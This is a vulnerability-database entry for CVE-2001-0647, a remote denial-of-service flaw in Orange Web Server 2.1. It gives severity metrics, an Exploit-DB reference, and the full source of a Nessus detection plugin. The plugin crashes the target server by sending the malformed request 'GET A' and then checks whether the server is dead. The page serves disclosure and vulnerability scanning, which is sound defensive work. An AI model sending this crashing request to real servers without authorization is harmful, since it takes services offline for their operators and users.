Vulnerabilities > CVE-2001-0647 - Unspecified vulnerability in Orange Software Orange web Server 2.1

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
orange-software
nessus
exploit available
NVD
Published: 2001-08-06
Updated: 2008-09-05

Summary

Orange Web Server 2.1, based on GoAhead, allows a remote attacker to perform a denial of service via an HTTP GET request that does not include the HTTP version.

Vulnerable Configurations

Part Description Count
Application
Orange_Software
1

Exploit-Db

descriptionOrange Software Orange Web Server 2.1 DoS Vulnerability. CVE-2001-0647. Dos exploit for windows platform
idEDB-ID:20655
last seen2016-02-02
modified2001-02-27
published2001-02-27
reporterslipy
sourcehttps://www.exploit-db.com/download/20655/
titleOrange Software Orange Web Server 2.1 DoS Vulnerability

Nessus

NASL familyWeb Servers
NASL idORANGE_DOS.NASL
descriptionIt was possible to make the remote web server crash by sending it an invalid HTTP request (GET A). An attacker may use this flaw to prevent this host from fulfilling its role.
last seen2020-06-01
modified2020-06-02
plugin id10636
published2001-03-25
reporterThis script is Copyright (C) 2001-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10636
titleOrange Web Server Malformed HTTP Request Remote DoS
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if(description)
{
 script_id(10636);
 script_version ("1.24");

 script_cve_id("CVE-2001-0647");
 script_bugtraq_id(2432);
 
 script_name(english:"Orange Web Server Malformed HTTP Request Remote DoS");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote has an application that is affected by a denial
of service vulnerability." );
 script_set_attribute(attribute:"description", value:
"It was possible to make the remote web server crash
by sending it an invalid HTTP request (GET A). An attacker
may use this flaw to prevent this host from fulfilling
its role." );
 script_set_attribute(attribute:"solution", value:
"Contact your vendor for a patch." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2001/03/25");
 script_set_attribute(attribute:"vuln_publication_date", value: "2001/02/27");
 script_cvs_date("Date: 2018/07/24 18:56:13");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();
 
 script_summary(english:"Crashes the remote web server");
 script_category(ACT_DENIAL);
 script_copyright(english:"This script is Copyright (C) 2001-2018 Tenable Network Security, Inc.");
 script_family(english:"Web Servers");
 script_dependencies("http_version.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);

if (report_paranoia < 2)
{
  b = get_http_banner(port: port);
  if (! egrep(string: b, pattern:"^Server: *GoAhead-Webs"))
    exit(0, "This is not Orange Web Server");
}


if (http_is_dead(port:port)) exit(1, "the web server is dead");

# The exploit was 'GET A \n' but I prefer that
w = http_send_recv_buf(port: port, data: 'GET A\r\r\n');
sleep(2);


if (http_is_dead(port:port, retry: 3))
{
  security_warning(port: port);
  exit(1, "the web server is dead");
}

References